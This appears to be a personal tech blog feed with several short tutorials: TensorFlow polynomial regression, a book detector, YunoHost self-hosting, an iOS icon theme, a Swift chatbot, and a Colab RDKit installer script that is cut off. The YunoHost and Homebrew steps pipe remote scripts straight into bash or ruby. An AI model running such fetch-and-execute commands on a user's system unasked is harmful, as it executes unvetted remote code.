Epoch 8000 : Training Cost: 3493009200.0 a,b,c,d: 819.13513 110.64169 -402.0677 449.3291
Epoch 9000 : Training Cost: 3455228400.0 a,b,c,d: 830.80255 24.0964 -553.92804 438.0652
Epoch 10000 : Training Cost: 3419475500.0 a,b,c,d: 842.21594 -60.797424 -700.0123 441.983
Epoch 11000 : Training Cost: 3385625300.0 a,b,c,d: 853.3363 -144.08699 -840.467 460.6356
Epoch 12000 : Training Cost: 3353544700.0 a,b,c,d: 864.19135 -225.8125 -975.4196 493.57703
Epoch 13000 : Training Cost: 3323125000.0 a,b,c,d: 874.778 -305.98932 -1104.9867 540.39465
Epoch 14000 : Training Cost: 3294257000.0 a,b,c,d: 885.1007 -384.63474 -1229.277 600.65607
Epoch 15000 : Training Cost: 3266820000.0 a,b,c,d: 895.18823 -461.819 -1348.4417 673.9051
Epoch 16000 : Training Cost: 3240736000.0 a,b,c,d: 905.0128 -537.541 -1462.6171 759.7118
Epoch 17000 : Training Cost: 3215895000.0 a,b,c,d: 914.60065 -611.8676 -1571.9058 857.6638
Epoch 18000 : Training Cost: 3192216800.0 a,b,c,d: 923.9603 -684.8093 -1676.4642 967.30475
Epoch 19000 : Training Cost: 3169632300.0 a,b,c,d: 933.08594 -756.3582 -1776.4275 1088.2198
Epoch 20000 : Training Cost: 3148046300.0 a,b,c,d: 941.9928 -826.6257 -1871.9355 1219.9702
Epoch 21000 : Training Cost: 3127394800.0 a,b,c,d: 950.67896 -895.6205 -1963.0989 1362.1665
Epoch 22000 : Training Cost: 3107608600.0 a,b,c,d: 959.1487 -963.38116 -2050.0586 1514.4026
Epoch 23000 : Training Cost: 3088618200.0 a,b,c,d: 967.4355 -1029.9625 -2132.961 1676.2717
Epoch 24000 : Training Cost: 3070361300.0 a,b,c,d: 975.52875 -1095.4292 -2211.854 1847.4485
Epoch 25000 : Training Cost: 3052791300.0 a,b,c,d: 983.4346 -1159.7922 -2286.9412 2027.4857
3052791300.0 983.4346 -1159.7922 -2286.9412 2027.4857
predictions = []
for x in abscissa:
    predictions.append((coefficient1*pow(x,3) + coefficient2*pow(x,2) + coefficient3*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Cubic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(no_of_epochs):
        for (x,y) in zip(abscissa, ordinate):
            sess.run(optimizer4, feed_dict={X:x, Y:y})
        if (epoch+1)%1000==0:
            cost = sess.run(mse4,feed_dict={X:abscissa,Y:ordinate})
            print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d:",sess.run(a),sess.run(b),sess.run(c),sess.run(d),sess.run(e))
    training_cost = sess.run(mse4,feed_dict={X:abscissa,Y:ordinate})
    coefficient1 = sess.run(a)
    coefficient2 = sess.run(b)
    coefficient3 = sess.run(c)
    coefficient4 = sess.run(d)
    constant = sess.run(e)
print(training_cost, coefficient1, coefficient2, coefficient3, coefficient4, constant)
Epoch 1000 : Training Cost: 1902632600.0 a,b,c,d: 84.48304 52.210594 54.791424 142.51952 512.0343
Epoch 2000 : Training Cost: 1854316200.0 a,b,c,d: 88.998955 13.073557 14.276088 223.55667 1056.4655
Epoch 3000 : Training Cost: 1812812400.0 a,b,c,d: 92.9462 -22.331177 -15.262934 327.41858 1634.9054
Epoch 4000 : Training Cost: 1775716000.0 a,b,c,d: 96.42522 -54.64535 -35.829437 449.5028 2239.1392
Epoch 5000 : Training Cost: 1741494100.0 a,b,c,d: 99.524734 -84.43976 -49.181057 585.85876 2862.4915
Epoch 6000 : Training Cost: 1709199600.0 a,b,c,d: 102.31984 -112.19895 -56.808075 733.1876 3499.6199
Epoch 7000 : Training Cost: 1678261800.0 a,b,c,d: 104.87324 -138.32709 -59.9442 888.79626 4146.2944
Epoch 8000 : Training Cost: 1648340600.0 a,b,c,d: 107.23536 -163.15173 -59.58964 1050.524 4798.979
Epoch 9000 : Training Cost: 1619243400.0 a,b,c,d: 109.44742 -186.9409 -56.53944 1216.6432 5454.9463
Epoch 10000 : Training Cost: 1590821900.0 a,b,c,d: 111.54233 -209.91287 -51.423084 1385.8513 6113.5137
Epoch 11000 : Training Cost: 1563042200.0 a,b,c,d: 113.54405 -232.21953 -44.73371 1557.1084 6771.7046
Epoch 12000 : Training Cost: 1535855600.0 a,b,c,d: 115.471565 -253.9838 -36.851135 1729.535 7429.069
Epoch 13000 : Training Cost: 1509255300.0 a,b,c,d: 117.33939 -275.29697 -28.0714 1902.5308 8083.9634
Epoch 14000 : Training Cost: 1483227000.0 a,b,c,d: 119.1605 -296.2472 -18.618649 2075.6094 8735.381
Epoch 15000 : Training Cost: 1457726700.0 a,b,c,d: 120.94584 -316.915 -8.650095 2248.3247 9384.197
Epoch 16000 : Training Cost: 1432777300.0 a,b,c,d: 122.69806 -337.30704 1.7027153 2420.5771 10028.871
Epoch 17000 : Training Cost: 1408365000.0 a,b,c,d: 124.42179 -357.45245 12.33499 2592.2983 10669.157
Epoch 18000 : Training Cost: 1384480000.0 a,b,c,d: 126.12332 -377.39734 23.168756 2763.0933 11305.027
Epoch 19000 : Training Cost: 1361116800.0 a,b,c,d: 127.80568 -397.16415 34.160156 2933.0452 11935.669
Epoch 20000 : Training Cost: 1338288100.0 a,b,c,d: 129.4674 -416.72803 45.259155 3101.7727 12561.179
Epoch 21000 : Training Cost: 1315959700.0 a,b,c,d: 131.11403 -436.14285 56.4436 3269.3142 13182.058
Epoch 22000 : Training Cost: 1294164700.0 a,b,c,d: 132.74377 -455.3779 67.6757 3435.3833 13796.807
Epoch 23000 : Training Cost: 1272863600.0 a,b,c,d: 134.35779 -474.45316 78.96117 3600.264 14406.58
Epoch 24000 : Training Cost: 1252052600.0 a,b,c,d: 135.9583 -493.38254 90.268616 3764.0078 15010.481
Epoch 25000 : Training Cost: 1231713700.0 a,b,c,d: 137.54753 -512.1876 101.59372 3926.4897 15609.368
1231713700.0 137.54753 -512.1876 101.59372 3926.4897 15609.368
predictions = []
for x in abscissa:
    predictions.append((coefficient1*pow(x,4) + coefficient2*pow(x,3) + coefficient3*pow(x,2) + coefficient4*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quartic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(no_of_epochs):
        for (x,y) in zip(abscissa, ordinate):
            sess.run(optimizer5, feed_dict={X:x, Y:y})
        if (epoch+1)%1000==0:
            cost = sess.run(mse5,feed_dict={X:abscissa,Y:ordinate})
            print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d,e,f:",sess.run(a),sess.run(b),sess.run(c),sess.run(d),sess.run(e),sess.run(f))
    training_cost = sess.run(mse5,feed_dict={X:abscissa,Y:ordinate})
    coefficient1 = sess.run(a)
    coefficient2 = sess.run(b)
    coefficient3 = sess.run(c)
    coefficient4 = sess.run(d)
    coefficient5 = sess.run(e)
    constant = sess.run(f)
print(training_cost, coefficient1, coefficient2, coefficient3, coefficient4, coefficient5, constant)
Epoch 1000 : Training Cost: 1409200100.0 a,b,c,d,e,f: 7.949472 7.46219 55.626034 184.29028 484.00223 1024.0083
Epoch 2000 : Training Cost: 1306882400.0 a,b,c,d,e,f: 8.732181 -4.0085897 73.25298 315.90103 904.08887 2004.9749
Epoch 3000 : Training Cost: 1212606000.0 a,b,c,d,e,f: 9.732249 -16.90125 86.28379 437.06552 1305.055 2966.2188
Epoch 4000 : Training Cost: 1123640400.0 a,b,c,d,e,f: 10.74851 -29.82692 98.59997 555.331 1698.4631 3917.9155
Epoch 5000 : Training Cost: 1039694300.0 a,b,c,d,e,f: 11.75426 -42.598194 110.698326 671.64355 2085.5513 4860.8535
Epoch 6000 : Training Cost: 960663550.0 a,b,c,d,e,f: 12.745439 -55.18337 122.644936 786.00214 2466.1638 5794.3735
Epoch 7000 : Training Cost: 886438340.0 a,b,c,d,e,f: 13.721028 -67.57168 134.43822 898.3691 2839.9958 6717.659
Epoch 8000 : Training Cost: 816913100.0 a,b,c,d,e,f: 14.679965 -79.75113 146.07385 1008.66895 3206.6692 7629.812
Epoch 9000 : Training Cost: 751971500.0 a,b,c,d,e,f: 15.62181 -91.71608 157.55713 1116.7715 3565.8323 8529.976
Epoch 10000 : Training Cost: 691508740.0 a,b,c,d,e,f: 16.545347 -103.4531 168.88321 1222.6348 3916.9785 9416.236
Epoch 11000 : Training Cost: 635382000.0 a,b,c,d,e,f: 17.450052 -114.954254 180.03932 1326.1565 4259.842 10287.99
Epoch 12000 : Training Cost: 583477250.0 a,b,c,d,e,f: 18.334944 -126.20821 191.02948 1427.2095 4593.8 11143.449
Epoch 13000 : Training Cost: 535640400.0 a,b,c,d,e,f: 19.198917 -137.20206 201.84718 1525.6926 4918.5327 11981.633
Epoch 14000 : Training Cost: 491722240.0 a,b,c,d,e,f: 20.041153 -147.92719 212.49709 1621.5496 5233.627 12800.468
Epoch 15000 : Training Cost: 451559520.0 a,b,c,d,e,f: 20.860966 -158.37456 222.97133 1714.7141 5538.676 13598.337
Epoch 16000 : Training Cost: 414988960.0 a,b,c,d,e,f: 21.657421 -168.53406 233.27422 1805.0874 5833.1978 14373.658
Epoch 17000 : Training Cost: 381837920.0 a,b,c,d,e,f: 22.429693 -178.39536 243.39914 1892.5883 6116.847 15124.394
Epoch 18000 : Training Cost: 351931300.0 a,b,c,d,e,f: 23.176882 -187.94789 253.3445 1977.137 6389.117 15848.417
Epoch 19000 : Training Cost: 325074400.0 a,b,c,d,e,f: 23.898485 -197.18741 263.12512 2058.6716 6649.8037 16543.95
Epoch 20000 : Training Cost: 301073570.0 a,b,c,d,e,f: 24.593851 -206.10497 272.72385 2137.1797 6898.544 17209.367
Epoch 21000 : Training Cost: 279727000.0 a,b,c,d,e,f: 25.262104 -214.69217 282.14642 2212.6372 7135.217 17842.854
Epoch 22000 : Training Cost: 260845550.0 a,b,c,d,e,f: 25.903376 -222.94969 291.4003 2284.9844 7359.4644 18442.408
Epoch 23000 : Training Cost: 244218030.0 a,b,c,d,e,f: 26.517094 -230.8697 300.45532 2354.3003 7571.261 19007.49
Epoch 24000 : Training Cost: 229660080.0 a,b,c,d,e,f: 27.102589 -238.44817 309.35342 2420.4185 7770.5728 19536.19
Epoch 25000 : Training Cost: 216972400.0 a,b,c,d,e,f: 27.660324 -245.69016 318.10062 2483.3608 7957.354 20027.707
216972400.0 27.660324 -245.69016 318.10062 2483.3608 7957.354 20027.707
predictions = []
for x in abscissa:
    predictions.append((coefficient1*pow(x,5) + coefficient2*pow(x,4) + coefficient3*pow(x,3) + coefficient4*pow(x,2) + coefficient5*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quintic Regression Result')
plt.legend()
plt.show()
You just learnt Polynomial Regression using TensorFlow!
Overfitting refers to a model that models the training data too well. Overfitting happens when a model learns the detail and noise in the training data to the extent that it negatively impacts the performance of the model on new data. This means that the noise or random fluctuations in the training data is picked up and learned as concepts by the model. The problem is that these concepts do not apply to new data and negatively impact the models ability to generalise.
Source: Machine Learning Mastery
Basically, if you train your machine learning model on a small dataset for a really large number of epochs, the model will learn all the deformities/noise in the data and will actually think that it is a normal part of the data. Therefore, when it sees some new data, it will discard that data as noise, which impacts the accuracy of the model in a negative manner.
]]>Made for Google Code-In
Task Description
Using Glitch and the Teachable Machines, build a Book Detector with Tensorflow.js. When a book is recognized, the code would randomly suggest a book/tell a famous quote from a book. Here is an example Project to get you started: https://glitch.com/~voltaic-acorn
1) Collecting Data
Teachable Machine allows you to create your dataset just by using your webcam! I created a dataset consisting of three classes (three books) and grabbed approximately 100 pictures for each book/class.
2) Training
Training on teachable machines is as simple as clicking the train button. I did not even have to modify any configurations.
3) Finding Labels
Because I originally entered the entire name of the book and its author's name as the label, the class name got truncated (note to self: use shorter class names :p). I then modified the code to print the truncated label names in an alert box.
4) Adding a suggestions function
I first added a text field on the main page and then modified the JavaScript file to suggest a similar book whenever the model predicted with an accuracy >= 98%
5) Running!
Here it is running!
Remix this project:
https://luminous-opinion.glitch.me
]]>The standard form of a quadratic equation is:

$$ax^2 + bx + c = 0$$

Here, $a \neq 0$, and $a$, $b$ and $c$ are real numbers.

We begin by first dividing both sides by the coefficient $a$:

$$x^2 + \frac{b}{a}x + \frac{c}{a} = 0$$

We can rearrange the equation:

$$x^2 + \frac{b}{a}x = -\frac{c}{a}$$

We can then use the method of completing the square. (Maths is Fun has a really good explanation for this technique)

$$x^2 + \frac{b}{a}x + \left(\frac{b}{2a}\right)^2 = -\frac{c}{a} + \left(\frac{b}{2a}\right)^2$$

On our LHS, we can clearly recognize that it is the expanded form of $\left(x + \frac{b}{2a}\right)^2$, i.e.

$$\left(x + \frac{b}{2a}\right)^2 = -\frac{c}{a} + \frac{b^2}{4a^2} = \frac{b^2 - 4ac}{4a^2}$$

Taking the square root of both sides:

$$x + \frac{b}{2a} = \pm\frac{\sqrt{b^2 - 4ac}}{2a}$$

This gives you the world famous quadratic formula:

$$x = \frac{-b \pm \sqrt{b^2 - 4ac}}{2a}$$
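As a quick numerical check of the formula (a small Python sketch, not part of the original derivation):

import math

def solve_quadratic(a, b, c):
    # Roots of ax^2 + bx + c = 0, assuming real roots (b^2 - 4ac >= 0) and a != 0
    disc = math.sqrt(b * b - 4 * a * c)
    return ((-b + disc) / (2 * a), (-b - disc) / (2 * a))

print(solve_quadratic(1, -5, 6))  # (3.0, 2.0), since x^2 - 5x + 6 = (x - 2)(x - 3)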
]]>With all these data leaks happening every other day, why have you not started self-hosting?
The title refers to the “Y U No Host” internet meme, which led to the name of “YunoHost”, an operating system aiming to democratise self-hosting. This post tries to discuss the idea that anyone can self-host and why you should consider YunoHost.
These are just some of the reasons to self-host.
No one is born with the knowledge of knowing how to orchestrate a cluster. You can always learn how to, but sometimes you just don’t have the time or energy. YunoHost tries to ease this issue by providing a clean web-interface. You do not even need to touch the command line for all the basic tasks.
Anything and everything! The best part about self-hosting is that you own the data. This data is not going to be sold to the highest bidder.
Just because you like watching YouTube does not mean you cannot self-host a privacy friendly front-end for it on your server. Why stop there, why not create your own Google Drive / Dropbox alternative and host it on your own with actual unlimited storage, where the only limit is how much capacity you want. Do you own tons of audiobooks or DVDs/Blu-rays? Simply host an audiobook server or create your own personal Netflix and share it with your friends and family.
Do you own a small-business? Do you hate the idea of having your sensitive e-mails stored on someone else’s server? Why not setup your own mail server, with contacts and calendar syncing.
Do you run a small hobby group? Why not host a forum for everyone to discuss on? Or, simply a chat server where everyone can hop on and text, or call.
Although you can do all of this (and much more!) without needing to use YunoHost, it just makes it easy to manage.
YunoHost is a server operating system which takes guesswork out of Self-Hosting. Out of the box it provides:
and much more!
I began my self-hosting journey with a Raspberry Pi 4 (4GB). I looked at tons of options for the base management layer:
One look at the user portal and I was sold. Yep, more than the features it was the app screen which looked like elements from the periodic table which sold me on the idea of using YunoHost.
Although there is no “correct“ way to self-host, YunoHost is indeed an easier way.
The stock Raspberry Pi image provided by YunoHost meant I wasn't running in full arm64 mode. I had to first install Debian and then install YunoHost on top to get full arm64 goodness.
Setting up the domain was as painless as following the online web admin diagnosis page to copy paste DNS records.
The easiest way to deploy any app is to use Docker. I dislike this approach for a variety of reasons but I am not going to cover them here. All YunoHost apps are packaged to run on bare-metal for the best performance. See an app that does not have pre-compiled binaries? The package installer will download the latest source, install dependencies, compile, and then clean all the unnecessary files. Because you are running Debian after all, you can always SSH into the server and install docker if you want to. You can even install Portainer through YunoHost’s app catalogue if you really want to.
Also, YunoHost has been here for a long time! Here is an old Hacker News post about YunoHost. All the projects mentioned in the comments? Dead.
curl https://install.yunohost.org | bash
Done!
Highly context dependent. I run two YunoHost servers in two different locations. One of the ISPs has actually blacklisted the residential IP address range and does not let me change my reverse DNS, which means all my outgoing emails are marked as spam. On the other hand, the other ISP gave me a clean static IP, and the server managed for a small business has no emailing problems at all. YMMV, but at least you know you have an option.
]]>I had a pack of NFC cards and decided it was the perfect time to create Music Cards. I do not have a "music setup," so I did not have to ensure this could work with any device. I settled on using a Shortcuts personal automation.
I tried measuring the card's dimensions with the in-built Measure app, but it was off by a few mm.
After measuring with a scale, I decided on a simple template I made in Apple Pages.
I created a personal automation in the Shortcuts app which is triggered when a particular NFC card is scanned, asks for the playback destination, and plays the album/playlist.
Note: Without the proper folder structure, your theme may not show up!
1) Create a folder called themeName.theme (replace themeName with your desired theme name)
2) Inside the themeName.theme folder, create another folder called IconBundles (you cannot change this name)
3) Inside the themeName.theme folder, create a file called Info.plist and paste the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>PackageName</key>
<string>ThemeName</string>
<key>ThemeType</key>
<string>Icons</string>
</dict>
</plist>
Replace PackageName with the name of the package and replace ThemeName with the theme name.

Now, you might ask: what is the difference between PackageName and ThemeName?

Well, if for example you want to publish two variants of your icons, one dark and one white, but you do not want the user to install them separately, then you would name the package MyTheme and include two themes, Blackie and White, thus creating two entries. More about this at the end.
Note: Due to IconBundles, we just need to create the icons in one size and they get resized automatically :ghost:
Want to create rounded icons? Create them squared only; we will learn how to apply masks later!
Note: All icons must be saved as *.png (Tip: This means you can even create partially transparent icons!)
Save the icons in themeName.theme > IconBundles as bundleID-large.png.

Stock Application BundleIDs:
Name | BundleID |
---|---|
App Store | com.apple.AppStore |
Apple Watch | com.apple.Bridge |
Calculator | com.apple.calculator |
Calendar | com.apple.mobilecal |
Camera | com.apple.camera |
Classroom | com.apple.classroom |
Clock | com.apple.mobiletimer |
Compass | com.apple.compass |
FaceTime | com.apple.facetime |
Files | com.apple.DocumentsApp |
Game Center | com.apple.gamecenter |
Health | com.apple.Health |
Home | com.apple.Home |
iBooks | com.apple.iBooks |
iTunes Store | com.apple.MobileStore |
Mail | com.apple.mobilemail |
Maps | com.apple.Maps |
Measure | com.apple.measure |
Messages | com.apple.MobileSMS |
Music | com.apple.Music |
News | com.apple.news |
Notes | com.apple.mobilenotes |
Phone | com.apple.mobilephone |
Photo Booth | com.apple.Photo-Booth |
Photos | com.apple.mobileslideshow |
Playgrounds | com.apple.Playgrounds |
Podcasts | com.apple.podcasts |
Reminders | com.apple.reminders |
Safari | com.apple.mobilesafari |
Settings | com.apple.Preferences |
Stocks | com.apple.stocks |
Tips | com.apple.tips |
TV | com.apple.tv |
Videos | com.apple.videos |
Voice Memos | com.apple.VoiceMemos |
Wallet | com.apple.Passbook |
Weather | com.apple.weather |
3rd Party Applications BundleID Click here
In your Info.plist file, add the following value between <dict> and </dict>:
<key>IB-MaskIcons</key>
<true/>
NOTE: This is an optional step; if you do not want icon masks, skip this step.
1) In the themeName.theme folder, create another folder called 'Bundles'
2) Inside Bundles, create another folder called com.apple.mobileicons.framework
Masking does not support IconBundles, so you need to save the masks for each of the following files and resolutions:
File | Resolution |
---|---|
AppIconMask@2x~ipad.png | 152x152 |
AppIconMask@2x~iphone.png | 120x120 |
AppIconMask@3x~ipad.png | 180x180 |
AppIconMask@3x~iphone.png | 180x180 |
AppIconMask~ipad.png | 76x76 |
DocumentBadgeMask-20@2x.png | 40x40 |
DocumentBadgeMask-145@2x.png | 145x145 |
GameAppIconMask@2x.png | 84x84 |
NotificationAppIconMask@2x.png | 40x40 |
NotificationAppIconMask@3x.png | 60x60 |
SpotlightAppIconMask@2x.png | 80x80 |
SpotlightAppIconMask@3x.png | 120x120 |
TableIconMask@2x.png | 58x58 |
TableIconOutline@2x.png | 58x58 |
Example (Credits: Pinpal): a squared icon, with the mask applied, would result in a rounded icon.
1) Create a new folder (separate from themeName.theme) with the name you want to be shown on Cydia, e.g. themeNameForCydia
2) Create a folder called DEBIAN in themeNameForCydia (it needs to be uppercase)
3) Inside DEBIAN, create an extension-less file called control and edit it using your favourite text editor

Paste the following in it, replacing yourname, themename, Theme Name, A theme with beautiful icons! and Your Name with your details:
Package: com.yourname.themename
Name: Theme Name
Version: 1.0
Architecture: iphoneos-arm
Description: A theme with beautiful icons!
Author: Your Name
Maintainer: Your Name
Section: Themes
Now, create another folder called Library in themeNameForCydia. Inside Library, create another folder called Themes. Copy themeName.theme to the Themes folder (copy the entire folder, not just the contents).
system, otherwise you can build it using your iPhones
1) Install Homebrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
(Run this in the terminal)
2) Install dpkg by running brew install dpkg
There is a terrible thing called .DS_Store which, if not removed, will cause a problem during either build or installation.
To remove this we first need to open the folder in the terminal
Launch the Terminal and then drag-and-drop the 'themeNameForCydia' folder on the Terminal icon in the dock
find . -name "*.DS_Store" -type f -delete
Then, type cd followed by a space, drag-and-drop the themeNameForCydia folder on the terminal, and hit enter. Now, inside themeNameForCydia, running
should show the following outputDEBIAN Library
cd .. && dpkg -b themeNameForCydia
Now you will have the themeNameForCydia.deb in the same directory.
You can share this with your friends :+1:
]]>I was trying to install AmberTools on my macOS Catalina installation. Running ./configure -macAccelerate clang gave me an error that it could not find the X11 libraries, even though locate libXt showed that my installation was correct.
Error:
Could not find the X11 libraries; you may need to edit config.h
to set the XHOME and XLIBS variables.
Error: The X11 libraries are not in the usual location !
To search for them try the command: locate libXt
On new Fedora OS's install the libXt-devel libXext-devel
libX11-devel libICE-devel libSM-devel packages.
On old Fedora OS's install the xorg-x11-devel package.
On RedHat OS's install the XFree86-devel package.
On Ubuntu OS's install the xorg-dev and xserver-xorg packages.
...more info for various linuxes at ambermd.org/ubuntu.html
To build Amber without XLEaP, re-run configure with '-noX11:
./configure -noX11 --with-python /usr/local/bin/python3 -macAccelerate clang
Configure failed due to the errors above!
I searched on Google for a solution. Sadly, there was not a single thread with a solution to this error.
Simply reinstalling XQuartz using Homebrew fixed the error: brew cask reinstall xquartz
If you do not have XQuartz installed, you need to run brew cask install xquartz instead.
A chatbot/virtual assistant, on paper, looks easy to build. The user says something, the program finds the best action, checks if additional input is required, and sends back the output. To do this in Swift, I used two separate ML models created using Apple's Create ML app. The first is a text classifier to classify intent, and the other is a word tagger for extracting input from the user's message. Disclaimer: This is a very crude proof-of-concept, but it does work.
I opened a CSV file and added some sample entries, with a corresponding label.
text,label
hey there,greetings
hello,greetings
good morning,greetings
good evening,greetings
hi,greetings
open the pod bay doors,banter
who let the dogs out,banter
ahh that's hot,banter
bruh that's rad,banter
nothing,banter
da fuq,banter
can you tell me details about the compound aspirin,deez-drug
i want to know about some compounds,deez-drug
search about the compound,deez-drug
tell me about the molecule,deez-drug
tell me about something,banter
tell me something cool,banter
tell a joke,banter
make me a sandwich,banter
whatcha doing,greetings
i love you,banter
This is useful for extracting the required variables directly from the user's input. This model will only be called if the intent from the classifier is a custom action. I created a sample JSON with only 3 examples (I know, very few, but it works for a crude PoC).
[
{
"tokens": ["Tell","me","about","the","drug","Aspirin","."],
"labels": ["NONE","NONE","NONE","NONE","NONE","COMPOUND","NONE"]
},
{
"tokens": ["Please","tell","me","information","about","the","compound","salicylic","acid","."],
"labels": ["NONE","NONE","NONE","NONE","NONE","NONE","NONE","COMPOUND","COMPOUND","NONE"]
},
{
"tokens": ["Information","about","the","compound","Ibuprofen","please","."],
"labels": ["NONE","NONE","NONE","NONE","COMPOUND","NONE","NONE"]
}
]
The initial part is easy, importing CoreML and NaturalLanguage and then initializing the models and the tagger.
import CoreML
import NaturalLanguage
let mlModelClassifier = try IntentDetection_1(configuration: MLModelConfiguration()).model
let mlModelTagger = try CompoundTagger(configuration: MLModelConfiguration()).model
let intentPredictor = try NLModel(mlModel: mlModelClassifier)
let tagPredictor = try NLModel(mlModel: mlModelTagger)
let tagger = NLTagger(tagSchemes: [.nameType, NLTagScheme("Apple")])
tagger.setModels([tagPredictor], forTagScheme: NLTagScheme("Apple"))
Now, we define a simple structure which the custom function(s) can use to access the provided input. It can also be used to hold additional variables. The custom action for our third label uses the word tagger model to check for a compound in the user's message. If one is present, it displays the name; otherwise, it tells the user that they have not provided the input. The latter can be replaced with a function which asks the user for the input.
struct User {
static var message = ""
}
func customAction() -> String {
let sampleMessage = User.message
var actionable_item = ""
tagger.string = sampleMessage
tagger.enumerateTags(in: sampleMessage.startIndex..<sampleMessage.endIndex, unit: .word,
scheme: NLTagScheme("Apple"), options: .omitWhitespace) { tag, tokenRange in
if let tag = tag {
if tag.rawValue == "COMPOUND" {
actionable_item += sampleMessage[tokenRange]
}
}
return true
}
if actionable_item == "" {
return "You did not provide any input"
} else {
return "You provided input \(actionable_item) for performing custom action"
}
}
Sometimes, no action needs to be performed, and the bot can use a predefined set of responses. Otherwise, if an action is required, it can call the custom action.
let defaultResponses = [
"greetings": "Hello",
"banter": "no, plix no"
]
let customActions = [
"deez-drug": customAction
]
For each sample message, the program updates User.message and checks if the predicted intent has a default response. Otherwise, it calls the matching custom action.
let sampleMessages = [
"Hey there, how is it going",
"hello, there",
"Who let the dogs out",
"can you tell me about the compound Geraniin",
"what do you know about the compound Ibuprofen",
"please, tell me more about the compound",
"please, tell me more about the molecule dihydrogen-monoxide"
]
for sampleMessage in sampleMessages {
User.message = sampleMessage
let prediction = intentPredictor.predictedLabel(for: sampleMessage)
if (defaultResponses[prediction!] != nil) {
print(defaultResponses[prediction!]!)
} else if (customActions[prediction!] != nil) {
print(customActions[prediction!]!())
}
}
So easy.
If I ever release a part-2, it will either be about implementing this in Tensorflow.JS or an iOS app using SwiftUI ;)
]]>I know that the title is a bit weird. I was trying to interact with a video under an iPhone Bezel Screen frame.
<div class="row-span-2 md:col-span-1 rounded-xl border-2 border-slate-400/10 bg-neutral-100 p-4 dark:bg-neutral-900">
<div class="content flex flex-wrap content-center justify-center">
<img src="iphone-12-white.png" class="h-[60vh] z-10 absolute">
<!--<img src="screenshot2.jpeg" class="h-[57vh] mt-4 mr-1 rounded-[2rem]">-->
<video src="screenrec.mp4" class="h-[57vh] mt-4 mr-1 rounded-[2rem]" controls muted autoplay></video>
</div>
</div>
Turns out, you can disable pointer events!
In Tailwind, it is as simple as adding pointer-events-none
to the bezel screen.
In CSS, this can be done by:
.className {
pointer-events: none
}
Let us try this in a simple example.
Here, we create a button and overlay a transparent box
<div style="height: 200px; width: 300px; background-color: rgba(255, 0, 0, 0.4); z-index: 2; position: absolute;">
A box with 200px height and 300px width
</div>
<button style="z-index: 1; margin-top: 20px; margin-bottom: 200px;" onclick="alert('You were able to click this button')">Try clicking me</button>
As you can see, you cannot click the button because the red box comes in the way. We can fix this by adding pointer-events: none
to the box.
<div style="height: 200px; width: 300px; background-color: rgba(0, 255, 0, 0.4); z-index: 2; position: absolute; pointer-events: none;">
A box with 200px height and 300px width
</div>
<button style="z-index: 1; margin-top: 20px; margin-bottom: 200px" onclick="alert('You were able to click this button')">Try clicking me</button>
]]>
This was tested on TF 2.x and works as of 2019-12-10
If you want to understand how to make your own custom image classifier, please refer to my previous post.
If you followed my last post, then you created a model which took an image of dimensions 50x50 as an input.
First we import the following (if we have not imported these before):
import cv2
import os
import numpy as np
import tensorflow as tf
from PIL import Image
Then we read the file using OpenCV.
image=cv2.imread(imagePath)
The cv2.imread() function returns a NumPy array representing the image. Therefore, we need to convert it to a PIL image before we can use it.
image_from_array = Image.fromarray(image, 'RGB')
Then we resize the image
size_image = image_from_array.resize((50,50))
After this we create a batch consisting of only one image
p = np.expand_dims(size_image, 0)
We then convert this uint8 datatype to a float32 datatype
img = tf.cast(p, tf.float32)
Finally we make the prediction
print(['Infected','Uninfected'][np.argmax(model.predict(img))])
Infected
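To put all of these steps together, here is a rough helper (a sketch; it assumes model is the 50x50 classifier from the previous post, with the same Infected/Uninfected label order):
import cv2
import numpy as np
import tensorflow as tf
from PIL import Image

def predict_image(image_path, model, labels=('Infected', 'Uninfected')):
    image = cv2.imread(image_path)         # NumPy array (OpenCV loads channels as BGR)
    image = Image.fromarray(image, 'RGB')  # wrap it as a PIL image, as in the steps above
    image = image.resize((50, 50))         # match the model's input dimensions
    batch = np.expand_dims(image, 0)       # a batch consisting of only one image
    batch = tf.cast(batch, tf.float32)     # uint8 -> float32
    return labels[np.argmax(model.predict(batch))]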
Update: March 2024
rdkit-pypi
has been deprecated in favour of rdkit
You can simply run:
!pip install rdkit
EDIT: Try installing RDKit using pip
!pip install rdkit-pypi
RDKit is one of the most integral parts of any cheminformatics specialist's toolkit, but it is notoriously difficult to install unless you already have conda installed. I originally found this in a GitHub Gist, but I have not been able to find that gist again :/
Just copy and paste this in a Colab cell and it will install it 👍
import sys
import os
import requests
import subprocess
import shutil
from logging import getLogger, StreamHandler, INFO
logger = getLogger(__name__)
logger.addHandler(StreamHandler())
logger.setLevel(INFO)
def install(
chunk_size=4096,
file_name="Miniconda3-latest-Linux-x86_64.sh",
url_base="https://repo.continuum.io/miniconda/",
conda_path=os.path.expanduser(os.path.join("~", "miniconda")),
rdkit_version=None,
add_python_path=True,
force=False):
"""install rdkit from miniconda
import rdkit_installer
rdkit_installer.install()
```
"""
python_path = os.path.join(
conda_path,
"lib",
"python{0}.{1}".format(*sys.version_info),
"site-packages",
)
if add_python_path and python_path not in sys.path:
logger.info("add {} to PYTHONPATH".format(python_path))
sys.path.append(python_path)
if os.path.isdir(os.path.join(python_path, "rdkit")):
logger.info("rdkit is already installed")
if not force:
return
logger.info("force re-install")
url = url_base + file_name
python_version = "{0}.{1}.{2}".format(*sys.version_info)
logger.info("python version: {}".format(python_version))
if os.path.isdir(conda_path):
logger.warning("remove current miniconda")
shutil.rmtree(conda_path)
elif os.path.isfile(conda_path):
logger.warning("remove {}".format(conda_path))
os.remove(conda_path)
logger.info('fetching installer from {}'.format(url))
